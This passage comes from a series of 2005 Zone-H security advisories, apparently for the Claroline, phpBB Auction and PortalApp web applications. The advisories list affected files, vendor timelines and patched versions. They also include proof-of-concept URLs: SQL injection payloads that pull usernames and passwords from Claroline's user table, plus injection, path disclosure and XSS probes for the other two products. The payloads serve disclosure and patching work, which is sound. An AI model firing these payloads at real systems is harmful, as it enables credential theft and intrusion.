claroline/tracking/exercises_details.php
claroline/learnPath/learningPathAdmin.php
claroline/tracking/learnPath_details.php
claroline/user/userInfo.php (2)
claroline/learnPath/modules_pool.php
claroline/learnPath/module.php
Examples:
claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*
claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--
[..]
3) Multiple directory traversal vulnerabilities in "claroline/document/document.php" and "claroline/learnPath/insertMyDoc.php" could allow project administrators (teachers) to upload files to arbitrary folders, or to copy/move/delete (and then view) files in arbitrary folders, by performing directory traversal attacks.
4) Four remote file inclusion vulnerabilities have been discovered.
Solution
--------
Claroline users are urged to update to version 1.54 or 1.6 final:
http://www.claroline.net/download.htm
See also:
http://www.claroline.net/news.php#85
http://www.claroline.net/news.php#86
Timeline
--------
18/04 Vulnerabilities found
22/04 Vendor contacted (quick answer)
25/04 Claroline 1.54 released
26/04 Claroline 1.6 final released
27/04 Users alerted via the mailing list
27/04 Advisory released
French version available here: http://fr.zone-h.org/fr/advisories/read/id=180/
English version: http://www.zone-h.org/advisories/read/id=7472
Zone-H Research Center
http://fr.zone-h.org
Join us on #zone-h @ irc.eu.freenode.net
You can contact the team leader at deepfear@fr.zone-h.org
Thanks to University Montpellier 2.

[ZH2005-12SA] sNKenjoi's Security Advisory: SQL Injection & Full Path Disclosure in phpBB Auction
04/21/2005
Security Advisory: SQL Injection & Full Path Disclosure in phpBB Auction
Severity: Medium
Title: SQL Injection & Full Path Disclosure in phpBB Auction
Versions
phpBB: Any Version
Auction Mod: Version 1.2m (and below)
Vendor: phpBB-Auction
Vendor Website: http://www.phpbb-auction.com/
Proof of Concept Exploits:
SQL Injection (Full Path Disclosure also works sometimes)
http://localhost/auction_rating.php?mode=view&u='
http://localhost/auction_offer.php?mode=add&ar='
Full Path Disclosure
http://localhost/auction_myauctions.php?mode=f00b4r
(For some you will have to be logged in)
snkenjoi.com & zone-h.org
snkenjoi@gmail.com

[ZH2005-11SA] sNKenjoi's Security Advisory: XSS Vulnerabilities in PortalApp v3.3
04/19/2005
sNKenjoi's Security Advisory: XSS Vulnerabilities in PortalApp v3.3
Security Advisory: XSS Vulnerabilities in PortalApp v3.3
Severity: Medium
Title: XSS Vulnerabilities in PortalApp v3.3
Vendor: Iatek
Vendor Website: http://www.portalapp.com/
Proof of Concept Exploits:
XSS
http://localhost/content.asp?contenttype=[XSS]
Syntax Error
http://localhost/content.asp?ContentId=..
http://localhost/content.asp?CatId=..
http://localhost/search_content.asp?ContentTypeId=..
http://localhost/forums.asp?ForumId=..
snkenjoi.com & zone-h.org
snkenjoi@gmail.com